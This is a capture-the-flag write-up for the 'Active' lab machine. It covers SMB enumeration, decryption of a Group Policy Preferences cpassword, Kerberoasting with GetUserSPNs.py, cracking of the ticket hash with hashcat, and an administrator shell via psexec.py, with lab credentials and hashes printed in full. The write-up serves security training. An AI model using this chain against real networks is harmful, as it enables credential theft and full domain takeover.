Active
Port Scanning
nmap -p53,88,135,139,445,464,593,636,3268,5722,9389,47001,49155,49152,49158,49168,49165,49169,49157,49154,49153 -sV -sC -T4 -Pn -oA active.htb active.htbScanning Result
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
SMB Enum
Smb open port 139/445
smbclient
smbclient -L //active.htb/Replication -U ""%""
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
smclient login
smbclient //10.10.10.100/Replication -U ""%""
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 18:37:44 2018
.. D 0 Sat Jul 21 18:37:44 2018
Groups.xml A 533 Thu Jul 19 04:46:06 2018
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
enum4linux
enum4linux active.htb
==================================( Share Enumeration on active.htb )==================================
do_connect: Connection to active.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on active.htb
//active.htb/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//active.htb/C$ Mapping: DENIED Listing: N/A Writing: N/A
//active.htb/IPC$ Mapping: OK Listing: DENIED Writing: N/A
[E] Can't understand response:
do_connect: Connection to DC.active.htb failed (Error NT_STATUS_UNSUCCESSFUL)
//active.htb/NETLOGON Mapping: N/A Listing: N/A Writing: N/A
//active.htb/Replication Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
do_connect: Connection to DC.active.htb failed (Error NT_STATUS_UNSUCCESSFUL)
//active.htb/SYSVOL Mapping: N/A Listing: N/A Writing: N/A
//active.htb/Users Mapping: DENIED Listing: N/A Writing: N/A
smbmap
smbmap -H active.htb -R
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
.\Replication\*
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 active.htb
.\Replication\active.htb\*
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 scripts
.\Replication\active.htb\DfsrPrivate\*
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 Installing
.\Replication\active.htb\Policies\*
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 18:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
Foothold
Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
active.htb\SVC_TGS : edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQDecrypt the hash/key
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ | tee cred
active.htb\SVC_TGS : GPPstillStandingStrong2k18Check for account SMB ACCESS connection
smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLYPriv Esc
Check for Kerberoasting
GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.outObtained hash (GetUserSPNs.out)
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$1ffa88531f4948eca74e8c85e3d7096f$ad3f1fb1ea3a5cb7e7c100b79ff57772260142c39dca461598d754b4c6cf2713e5dee298718093a5aa2ad6dbd1852a3c42afed10d3e6730fb84d76ff5b62f5be3eb1b0d1e9803473fc4e9e0645b8640e6d3d6bc6c852974d2c10770ad79f246a39fed1ae593824833f9d7ef26dcc90bafe5af1f4efc0a77bbbfdfeae5889eac85b1946059f8760f3ce6d902ae256cbb8012607465950c64dd7e4ccd0b5d3e16b84cf537ee5b377c278ced5e8873be6227aa7b32ca4a986db3c7d3ca7d2fa52cc7830f6dc504cef40a137eb93666c5bf4c6a9f4152651e8ef61c3686671a36bc554f79994da9442157b9be265afccc97bc07901c56b346db52ce90870b23a28e2a2e7e6565f1ef4db5b67eab13c684b4ba9c57179f203ef69a7b425533ab071e0230b2fb8d2389f44466d2307c735a8c903707f11884dd14dc51f065f875bf76e009f407e90d99759c4c9612741ce4fa630bead71fa1c87bf53a1815e28b18c0660437b2bbd8b2468ad6b11de0f40343a151daf5aebd07f10b4ec7a8f4f7afa3e8db898b6925d5833025c7cd3a715229c6ceec598e2b9b168a1977ac5c711bd57b9384de0b24140f68a4207650cce4da589c9db32e4455192da0964af242bc05aa3e51350cbc2c004b904909258c6b00f443c330244c8adf47ec6fdb495438346aadede69658c3cb0bb53c4b485d7f81f29670caee26e1cf763fc4b6ae18ff5af89acda09ab122aa846a4f24e5d23400a620a06caf3fc40f414fb32a99a4a7151b92e69ab772dc6233d0edfeafd9e772c642fbf25e486ae170182743a1cfe83c592bbbfe15dc86106becc8a3dee44db0372d9a547de82cebfa745df85123282fd221149a66dbb6847c8b5581722a97af36c4d8b31e954f72cc66745c8ab6d36485845a4a58826a47a1a776e8b88b37f446d6ab597e7fb8fcaac129846510d1b958c84ad493d602a5783e927142233e0d10c9ac4ead27331ca559415bb499efbbb91ba3cb2790028dcd8bc402cbe236b4459ea8757ca5429dcf7ce1d06614e8f4e4b071502cf9a860cade83165bc5c4f49f610be97861a25c2133a9b784288839022afa85e692042d8ff197498cfe466ee460df9e282ac8bb10823822dce7cac0e73cdb4ef7ffaf4432a06da4cb2b4d280c59be071a729090772ffa98957f1db3ef0033e7a7c2b0bb247688fe9a1cdcb8f829e96f4e773665987bfa9929d8b23663efa870cc5c8148e2245728813a2b973b34763383874de869776Using hashcat to crack it
hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force -m 13100 for
NTLMhashes
Cracked
administrator :Ticketmaster1968Get a shell using psexec
psexec.py active.htb/administrator@10.10.10.100Last updated